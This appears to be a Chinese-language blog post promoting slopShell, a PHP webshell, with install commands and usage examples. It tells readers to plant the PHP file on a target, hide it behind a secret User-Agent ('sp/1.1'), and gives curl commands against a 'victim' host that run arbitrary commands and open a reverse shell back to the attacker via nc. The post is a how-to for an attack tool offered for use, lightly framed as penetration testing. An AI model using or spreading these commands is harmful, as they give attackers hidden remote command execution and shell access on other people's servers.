slopShell:强大的PHP Webshell

关于slopShell
slopShell是一款功能强大的PHP Webshell,有了它,你就不需要再用到其他Webshell了。
为了让这个shell正常工作,广大研究人员只需要做两件事情,一是能够将php文件发送给目标用户,二是能够向这个Webshell发送HTTP请求
slopShell:强大的PHP Webshell

工具安装
首先,广大研究人员需要运行一台由自己控制的pgsql服务器,然后根据自己的操作系统类型选择对应的安装命令:

Debian
apt install -y postgresql php php-pear && python -m pip install proxybroker --user
RHEL系统
dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user
一旦这些设置正确并且可以确认它们正在运行,我建议广大研究人员运行命令“pg_ctl”来创建数据库,并实现数据库的初始化和启动,以此确保所有数据库查询都可以正常工作。

工具交互
首先,您需要选择一个有效的User-Agent来使用,你可以把它看成是第一层保护,以防您的webshell被除您之外的任何人意外地发现。我这里选择的是“sp/1.1”,因为它是一个非典型的User-Agent。如果设置不当的话,可能会导致渗透测试过程中出现问题,或者导致脚本和访问请求被屏蔽。对于Windows版本的话,我没有添加过多内容,因为本人不太喜欢Windows开发。

下面给出的是如何将此webshell与curl一起使用的示例:
curl https://victim/slop.php?qs=cqP -H “User-Agent: sp/1.1” -v
或者,执行下列自定义命令:
curl https://victim/slop.php --data “commander=id” -H “User-Agent: sp/1.1” -v
或者,可以尝试跟你自己的设备建立一个反向Shell:
curl https://victim/slop.php --data “rcom=1&mthd=nc&rhost=&rport=&shell=sh” -H “User-Agent: sp/1.1” -v
工具使用样例
在浏览器中,在不使用正常User-Agent字符串的情况下发送请求(第一层认证):
slopShell:强大的PHP Webshell

在命令行终端窗口中,使用curl命令以及-vH "User-Agent: sp1.1"选项执行:
slopShell:强大的PHP Webshell

项目地址
slopShell:
https://github.com/oldkingcone/slopShell

slopShell:强大的PHP Webshell

上一篇:后门查杀


下一篇:WEBshell与文件上传漏洞